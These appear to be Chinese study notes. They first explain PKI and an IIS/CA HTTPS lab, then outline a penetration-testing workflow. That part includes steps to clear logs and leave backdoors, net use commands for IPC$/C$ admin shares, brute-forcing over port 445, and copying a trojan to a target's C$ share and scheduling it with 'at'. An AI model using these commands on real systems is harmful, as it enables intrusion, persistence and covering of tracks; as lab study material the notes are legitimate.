PKI

  1. PKI概述

    名称:PKI(Public Key Infrustructure)公钥基础设施

    作用:通过加密技术和数字签名保证信息安全。

    组成:公钥加密技术,数字证书,CA,RA。

  2. 信息安全三要素

    机密性,完整性,身份验证/操作的不可否认性

  3. 哪些IT领域用到PKI

    1. SSL/HTTPS
    2. IPsecVPN
    3. 部分远程访问VPN
  4. 公钥加密技术

    作用:实现对信息加密,数字签名等安全保障。

    加密算法:

    1. 对称加密算法

      加解密的密钥一致

      DES 3DES AES

      x+5=y(对称加密算法)

      x是原数据/原文

      y是密文

      5是key/密钥

    2. 非对称密钥

      通信双方各自产生一对公私钥

      双方各自交换公钥

      公钥和私钥为互相加解密关系

      公私钥不可相互逆推

      RSA DH

    3. HASH算法:MD5,SHA(验证完整性)

      HASH值可逆吗?不可逆。

      HASH值=摘要

    4. 数字签名

      用自己的私钥对摘要进行加密得出的密文就是数字签名

    5. 证书

      证书用于保证密钥的合法性

      证书格式遵循x.509标准

      数字证书包含信息:

      使用者的公钥值

      使用者标识信息(如名称和电子邮件地址)

      有效期(证书的有效时间)

      颁发者标识信息

      颁发者的数字签名

    数字证书由权威公正的第三方机构即CA签发

    CA是权威证书颁发机构,为了公正”公钥”的合法性

    机密性:使用对方的公钥加密

    身份验证/数字签名:使用自己的私钥

    PKI实验:

    1. win2008作为https服务器:10.1.1.2/24
    2. xp作为客户机:10.1.1.1/24
    3. 桥接到虚拟机网络vmenet1

    实验步骤:

    1. 配置服务器ip地址10.1.1.2/24
    2. 安装IIS服务,并建立一个站点。(必须使用域名),在客户机上设置hosts,并初步验证访问。
    3. 安装CA组件
    4. 打开IIS,先生成证书申请文件
    5. 向CA申请证书,打开网页http:10.1.1.2/certsrv并向CA发送web服务器申请文件
    6. CA颁发证书
    7. 在web服务器上下载并安装
    8. 在web服务器上启用SSL443
    9. 在客户端上修改hosts文件,并验证
    10. 要求用户必须使用443访问,不能使用80访问

渗透测试流程

  1. 授权

  2. 信息收集

    nslookup,whois

  3. 扫描漏洞

    namp=ip范围 端口 80(IIS,apache,什么网站)scanpot软件

    高级扫描:ruIIS漏洞2003-IIS6.0 2008IIS7.0,扫描网站漏洞

  4. 漏洞利用

  5. 提权(shell环境,桌面环境,最高权限)

  6. 清除日志

  7. 留后门

  8. 渗透测试报告

测试端口号开放

  1. (手动)telnet 目标ip 目标端口号
  2. 使用scanpot软件工具进行端口扫描(推荐Nmap)

利用漏洞进行破解

445漏洞利用之IPC$:

使用命令:net use f: \10.1.1.2\ipc$ 密码 /user:用户

相关命令:

net use f: /del

net use * /del

net use f: \10.1.1.2\c$ 密码 /user:用户

net use f: \10.1.1.2\share 密码 /user:用户

暴力破解系统密码之445

NTscan+密码字典生成工具

留后门

大鲨鱼,冰河,灰鸽子软件编写木马

制作木马

  1. copy植入木马

    copy d:\heihei.exe \\10.1.1.2\c$

  2. 获取目标时间

    net time \\10.1.1.2

    net time \\ 目标IP地址(两个\后紧跟地址)

  3. 设置计划任务自动执行

    at \\10.1.1.2 11:11 “c:\heihei.exe”

    at \\10.1.1.2 11:11 “木马程序位置”

  4. 查看程序是否存在

    at \\目标ip